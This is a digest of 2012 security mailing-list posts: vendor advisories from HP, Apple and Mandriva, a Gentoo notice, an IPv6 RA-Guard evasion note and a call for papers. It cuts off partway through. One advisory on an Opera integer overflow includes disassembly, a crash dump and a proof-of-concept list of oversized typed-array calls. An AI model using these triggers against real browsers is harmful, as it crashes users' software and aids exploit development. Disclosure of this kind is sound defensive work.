GLSA (Gentoo Linux Security Advisory) publication changes

[Alex Legler]

Like other Linux distribution vendors, Gentoo is currently CC'ing advisories 
to the full-disclosure and bugtraq mailing lists.
Starting today, we will be *no longer* publishing our advisories to full-
disclosure or bugtraq.
We are following our colleagues at Ubuntu with this decision.

Users who want to receive advisories via email in the future should subscribe 
to the gentoo-announce mailing list, as described here:
  http://www.gentoo.org/main/en/lists.xml

We also offer an RDF feed at
  http://www.gentoo.org/rdf/en/glsa-index.rdf

Finally, our security notices are posted to our forums at
  https://forums.gentoo.org/viewforum-f-16.html

All past and new advisories can be viewed at
  http://glsa.gentoo.org/

Please contact secur...@gentoo.org with any questions.

-- 
Alex Legler 
Gentoo Security/Ruby/Infrastructure


signature.asc
Description: This is a digitally signed message part.

[security bulletin] HPSBMU02739 SSRT100280 rev.1 - HP Data Protector Media Operations, Remote Execution of Arbitrary Code

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03179046
Version: 1

HPSBMU02739 SSRT100280 rev.1 - HP Data Protector Media Operations, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-02-01
Last Updated: 2012-02-01

 --

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Data Protector 
Media Operations. This vulnerabilities could be remotely exploited to allow 
execution of arbitrary code.

References: CVE-2011-4791 (ZDI-CAN-956, ZDI-11-112)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Data Protector Media Operations version 6.11 and earlier, running on Windows 
platform (2003, XP, 2008)

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-4791(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Roi Mallo along with TippingPoint.s Zero Day 
Initiative for reporting this vulnerability to security-al...@hp.com.

RESOLUTION

HP has provided the following patch to resolve this vulnerability.
The patch can be retrieved from 
http://support.openview.hp.com/selfsolve/document/KM1323025

For HP Data Protector Media Operations v6.20
operating System Platform / Patch ID / Executable

Windows (2003, XP, 2008) / SMO A.06.20.01 / SMOWIN_00010.EXE

HISTORY
Version: 1 (rev.1) - 01 February 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided "as is" 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk8pnYAACgkQ4B86/C0qfVnqXgCg95+iAp0ogjtCJuawOALQDl0r
A1QAnj2r41lOU8zjf84EMFmzXseMMPfh
=VZk1
-END PGP SIGNATURE-

[CAL-2012-0004] opera array integer overflow

[Code Audit Labs]

CAL-2012-0004 opera array integer overflow


1 Affected Products
=
11.60 and prior


2 Vulnerability Details
=

Code Audit Labs http://www.vulnhunt.com has discovered a integer 
overflow  vulnerability in array functions like

Int32Array,Int16Array... .

Opear vendor say "We have reproduced the problem, and determined that it 
does not have any security implications, since the crash is a caused by 
a memory fill operation which the webpage have no control over, and this 
operation will always crash. It is therefore classified as a stability 
issue, not a security issue. "



we still insist on that  it is a security issue or not should accord to 
root cause of this bug instead of is it exploitable or not. because you 
think it is unexploitable, someone can exploit it via deeply research.


So if most people of Security Community think this is a security issue,
please assign to a CVE number.


3 Analysis
=
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2  >2
2:x*2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x*2-1)+0x1f
memset(eax+0x10,0,x*2) cause memory corrupt


text:5C769F57
.text:5C769F57 loc_5C769F57:   ; CODE XREF: 
sub_5C769DCE+17Cj

.text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B imuleax, [esp+48h+var_3C] ; var_3C is 
8001

.text:5C769F60 cmp eax, [esp+48h+var_3C]
.text:5C769F64 jb  short loc_5C769F37
.text:5C769F66 mov [esp+48h+size], eax
.text:5C769F6A mov eax, [ebp+arg_0]
.text:5C769F6D callsub_5C14A6E8
.text:5C769F72 push[esp+48h+size]  ; size
.text:5C769F76 pushdword ptr [eax] ; int
.text:5C769F78 push[ebp+arg_0] ; int
.text:5C769F7B callsub_5C765B6D
.text:5C769F80 add esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0   = dword ptr  4
.text:5C46A598 size= dword ptr  8
.text:5C46A598
.text:5C46A598 mov edx, [esp+arg_0]
.text:5C46A59C pushesi
.text:5C46A59D mov esi, [esp+4+size]
.text:5C46A5A1 testesi, esi
.text:5C46A5A3 jz  short loc_5C46A5AA
.text:5C46A5A5 lea eax, [esi-1]
.text:5C46A5A8 jmp short loc_5C46A5AC
.text:5C46A5AA ; 
---

.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA:   ; CODE XREF: 
sub_5C46A598+Bj

.text:5C46A5AA xor eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC:   ; CODE XREF: 
sub_5C46A598+10j

.text:5C46A5AC mov ecx, [edx+8]
.text:5C46A5AF add eax, 1Fh
.text:5C46A5B2 push0
.text:5C46A5B4 and eax, 0FFF8h
.text:5C46A5B7 pusheax
.text:5C46A5B8 pushedx
.text:5C46A5B9 callsub_5C019DA0

ext:5C765BF7 loc_5C765BF7:   ; CODE XREF: 
sub_5C765B6D+50j

.text:5C765BF7 push[ebp+size]  ; size
.text:5C765BFA lea eax, [ebx+10h]
.text:5C765BFD push0   ; c
.text:5C765BFF pusheax ; dst
.text:5C765C00 callmemset




4 Exploitable?

who known?


5 Crash info:
===
(d10.ff4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx= ecx=0367ffb0 edx=0076 esi=019c5ff8 
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na 
pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= 
efl=00010207
*** ERROR: Symbol file could not be found.  Defaulted to export symbols 
for C:\Program Files\Opera\Opera.dll -

Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150  movdqa  xmmword ptr [ecx+50h],xmm0 
ds:0023:0368=

0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags: 
NumberParameters: 2
   Parameter[0]: 0001
   Parameter[1]: 0368
Attempt to write to address 0368
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be 
wrong.

02314e24  Opera!OpGetNextUninstallFile+0x1961c



6 POC:

open a html with following content


//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)





7 About Code Audit La

Fwd: RA-Guard: Advice on the implementation (feedback requested)

[Fernando Gont]

Folks,

We have talked about this one quite a few times (including
).
-- still, most implementations remain broken.

If you care to get this fixed, please provide feedback about this I-D on
the IETF *v6ops* mailing-list , and CC me if possible.

Thanks!

Best regards,
Fernando




 Original Message 
Subject: RA-Guard: Advice on the implementation  (feedback requested)
Date: Wed, 01 Feb 2012 21:44:29 -0300
From: Fernando Gont 
Organization: SI6 Networks
To: IPv6 Operations 

Folks,

We have just published a revision of our I-D "Implementation Advice for
IPv6 Router Advertisement Guard (RA-Guard)"
.

In essence, this is the problem statement, and what this I-D is about:

* RA-Guard is essential to have feature parity with IPv4.

* Most (all?) existing RA-Guard implementations can be trivially evaded:
if the attacker includes extension headers in his packets, the RA-Guard
devices fail to identify the Router Advertisement messages. -- For
instance, THC's "IPv6 attack suite" ()
contains tools that can evade RA-Guard as indicated.

* The I-D discusses this problem, and provides advice on how to
implement RA-Guard, such that the aforementioned vulnerabilities are
eliminated, we have an effective RA-Guard device, and hence
feature-parity with IPv4.

We'd like feedback on this I-D, including high-level comments on whether
you support the proposal in this I-D.

Thanks!

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

Call For Paper

[asemailing]

CALL FOR PAPER



2012 ASE/IEEE International Conference on Privacy, Security, Risk, and Trust
Amsterdam, The Netherlands, September 3-6, 2012
WebSite: http://www.asesite.org/conferences/PASSAT/2012/
Workshop Proposal Submission Deadline: March 1, 2012
Paper Submission Deadline:  May 11, 2012


2012 ASE/IEEE International Conference on Cyber Security
Washington D.C., USA, October 5-7, 2012
Website: http://www.asesite.org/conferences/cybersecurity/2012/
Workshop Proposal Submission Deadline: April 30, 2012
Paper Submission Deadline: June 15, 2012

NOTICE: This e-mail correspondence is subject to Public Records Law and may be 
disclosed to third parties.

APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001

[Apple Product Security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001

OS X Lion v10.7.3 and Security Update 2012-001 is now available and
addresses the following:

Address Book
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  An attacker in a privileged network position may intercept
CardDAV data
Description:  Address Book supports Secure Sockets Layer (SSL) for
accessing CardDAV. A downgrade issue caused Address Book to attempt
an unencrypted connection if an encrypted connection failed. An
attacker in a privileged network position could abuse this behavior
to intercept CardDAV data. This issue is addressed by not downgrading
to an unencrypted connection without user approval.
CVE-ID
CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation

Apache
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Multiple vulnerabilities in Apache
Description:  Apache is updated to version 2.2.21 to address several
vulnerabilities, the most serious of which may lead to a denial of
service. Further information is available via the Apache web site at
http://httpd.apache.org/
CVE-ID
CVE-2011-3348

Apache
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  An attacker may be able to decrypt data protected by SSL
Description:  There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Apache disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by providing a configuration
parameter to control the countermeasure and enabling it by default.
CVE-ID
CVE-2011-3389

CFNetwork
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description:  An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
the request to an incorrect origin server. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3246 : Erling Ellingsen of Facebook

CFNetwork
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description:  An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers. This issue does not affect systems prior
to OS X Lion.
CVE-ID
CVE-2011-3447 : Erling Ellingsen of Facebook

ColorSync
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact:  Viewing a maliciously crafted image with an embedded
ColorSync profile may lead to an unexpected application termination
or arbitrary code execution
Description:  An integer overflow existed in the handling of images
with an embedded ColorSync profile, which may lead to a heap buffer
overflow. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day
Initiative

CoreAudio
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact:  Playing maliciously crafted audio content may lead to an
unexpected application termination or arbitrary code execution
Description:  A buffer overflow existed in the handling of AAC
encoded audio streams. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative

CoreMedia
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description:  A heap buffer overflow existed in CoreMedia's handling
of H.264 encoded movie files.
CVE-ID
CVE-2011-3448 : Scott Stender of iSEC Partners

CoreText
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Viewing or downloading a document containing a maliciously
crafted embedded font may lead to an unexpected application
termination or arbitrary code execution
Description:  A use after free issue existed in the handling of font
files.
CVE-ID
CVE-2011-3449 : Will Dormann of the CERT/CC

CoreUI
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description:  An unbounded stack allocation issue existed in the
handling of long URLs. This issue does not affect systems prior to OS
X Lion.
CVE-ID
CVE-2011-3450 : Ben Syverson

curl
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Se

[ MDVSA-2012:012 ] apache

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:012
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: February 2, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in apache
 (ASF HTTPD):
 
 The log_cookie function in mod_log_config.c in the mod_log_config
 module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded
 MPM is used, does not properly handle a \%{}C format string, which
 allows remote attackers to cause a denial of service (daemon crash)
 via a cookie that lacks both a name and a value (CVE-2012-0021).
 
 scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might
 allow local users to cause a denial of service (daemon crash during
 shutdown) or possibly have unspecified other impact by modifying
 a certain type field within a scoreboard shared memory segment,
 leading to an invalid call to the free function (CVE-2012-0031).
 
 protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not
 properly restrict header information during construction of Bad
 Request (aka 400) error documents, which allows remote attackers to
 obtain the values of HTTPOnly cookies via vectors involving a (1)
 long or (2) malformed header in conjunction with crafted web script
 (CVE-2012-0053).
 
 The updated packages have been upgraded to the latest 2.2.22 version
 which is not vulnerable to this issue.
 
 Additionally APR and APR-UTIL has been upgraded to the latest versions
 1.4.5 and 1.4.1 respectively which holds many improvments over the
 previous versions.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053
 http://httpd.apache.org/security/vulnerabilities_22.html
 http://www.apache.org/dist/httpd/CHANGES_2.2.22
 http://www.apache.org/dist/apr/CHANGES-APR-1.4
 http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.4
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 56fb4ba5b622b9603972ce3cf697f965  
2010.1/i586/apache-base-2.2.22-0.1mdv2010.2.i586.rpm
 f5a8b8ca5a647ae031ed9ab220d0aed9  
2010.1/i586/apache-conf-2.2.22-0.1mdv2010.2.i586.rpm
 188a47c23fb1a981307e6ff856e105e1  
2010.1/i586/apache-devel-2.2.22-0.1mdv2010.2.i586.rpm
 b8ac0aee0046e2ea49d1e20c06d434cb  
2010.1/i586/apache-doc-2.2.22-0.1mdv2010.2.noarch.rpm
 21cbaa3ddbfb8404509663e26122aae4  
2010.1/i586/apache-htcacheclean-2.2.22-0.1mdv2010.2.i586.rpm
 059c090d1f06b406ad1ef5a2988e4af7  
2010.1/i586/apache-mod_authn_dbd-2.2.22-0.1mdv2010.2.i586.rpm
 6d724071c1444d4d10bf1f7ae93458c7  
2010.1/i586/apache-mod_cache-2.2.22-0.1mdv2010.2.i586.rpm
 8b7e6311edd39109c0fef022525216aa  
2010.1/i586/apache-mod_dav-2.2.22-0.1mdv2010.2.i586.rpm
 a24b8c9ad8877bbf5a89cfaddfbd13ce  
2010.1/i586/apache-mod_dbd-2.2.22-0.1mdv2010.2.i586.rpm
 2057cc8255abc168836d8857d971677d  
2010.1/i586/apache-mod_deflate-2.2.22-0.1mdv2010.2.i586.rpm
 76e225b09fc51fb027da2ea664c810ab  
2010.1/i586/apache-mod_disk_cache-2.2.22-0.1mdv2010.2.i586.rpm
 1b304277ed799f7fc6d9b4bac99636d1  
2010.1/i586/apache-mod_file_cache-2.2.22-0.1mdv2010.2.i586.rpm
 c94e655651a24327238d289d44fcaff7  
2010.1/i586/apache-mod_ldap-2.2.22-0.1mdv2010.2.i586.rpm
 9ae6ef480be66f4028978cbbbe399087  
2010.1/i586/apache-mod_mem_cache-2.2.22-0.1mdv2010.2.i586.rpm
 2b54a187fe6d6138587a9473e0b3e315  
2010.1/i586/apache-mod_proxy-2.2.22-0.1mdv2010.2.i586.rpm
 9f5d84b537476e18fc5fbdff311014cd  
2010.1/i586/apache-mod_proxy_ajp-2.2.22-0.1mdv2010.2.i586.rpm
 2527f0749e10889b06323ed655eb1831  
2010.1/i586/apache-mod_proxy_scgi-2.2.22-0.1mdv2010.2.i586.rpm
 f8f998f8b45fdd40db7e269addb99697  
2010.1/i586/apache-mod_reqtimeout-2.2.22-0.1mdv2010.2.i586.rpm
 a63a485aae54a95d27992f1476f156c2  
2010.1/i586/apache-mod_ssl-2.2.22-0.1mdv2010.2.i586.rpm
 21fb7bb7c9edbf4d342a1d564aedc4da  
2010.1/i586/apache-mod_suexec-2.2.22-0.1mdv2010.2.i586.rpm
 075258e0ba1c55800306d3c65dadf077  
2010.1/i586/apache-modules-2.2.22-0.1mdv2010.2.i586.rpm
 aaf72571b5573a5eab44d157063fb876  
2010.1/i586/apache-mod_userdir-2.2.22-0.1mdv2010.2.i586.rpm
 00b357ab023c4e2cac197b76a5b029e4  
2010.1/i586/apache-mpm-event-2.2.22-0.1mdv2010.2.i586.rpm
 995ff181c7fa28167cad871ace3efc8a  
2010.1/i586/apache-mpm-itk-2.2.22-0.1mdv2010.2.i586.rpm
 ac869b3eda31437eacd790a7e98c12bf  
2010.1/i586/apache-mpm-peruser-2.2.22-0.1mdv2010.2.i586.rpm
 42aadf645d6aa7ad442400184024da5d  
2010.1/i586/apache-mpm-prefork-2.2.22-0.1mdv2010.2.i586.rpm
 e48ee4f1e263630b33d91cc67b778d05  
2010.1/i586/apache-mpm-w